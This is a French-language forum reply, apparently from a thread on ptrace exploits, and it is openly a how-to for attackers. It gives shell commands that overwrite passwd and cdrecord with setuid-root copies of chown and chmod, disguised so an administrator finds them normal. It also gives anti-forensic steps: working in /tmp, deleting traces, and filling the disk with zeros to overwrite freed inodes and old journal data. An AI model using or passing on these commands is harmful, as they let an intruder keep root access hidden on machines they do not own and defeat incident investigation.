• [^] # Re: exploits ptrace

    Posté par . En réponse au journal exploits ptrace. Évalué à -1.

    si les machines sont en ext2, tu risque rien ... juste que find verifie les mise de stik bit ...

    c est plus risque sur du XFS ou autres systems journalises ...

    mais on peut contourner ... par exemple moi je fais :

    cp /bin/chown /usr/sbin/passwd
    cp /bin/chmod /usr/sbin/cdrecord
    chmod 7001 /usr/sbin/passwd /usr/sbin/cdrecord

    pour les autres users ... ce sera /usr/bin/passwd qui passera avent a cause de leur PATH ...
    et comme l admin vera un stick bit sur passwd et cdrecord, il trouvera ca normale ...

    une fois qu on a ces deux la ... c est la fete ...
    puisque ca permet de faire passer root toute autre fichier binaire ...
    c est une procedure elementaire qui permet de s auto reproduire, et de s etendre a d autres fichier ... c est comme la soupe primaire ... essentielle, mere de tout ...

    si on continues le travail dans /tmp ... on peut passer relaitvement inapercu ... en prenant soin d effacer les fichiers crees ...
    et si vous hakez un grand truc ... il faut aussi penser a effacer les anciennes versions du journal est autres inodes perdus , alors mettez vous en user et lancez un
    cat /dev/zero> /tmp/tmp
    ce qui realoura tous les inodes du disques pour la valeur 0 et effacera beaucoup de choses par la meme occasion ....

    ( ca merite bien un [+] ... )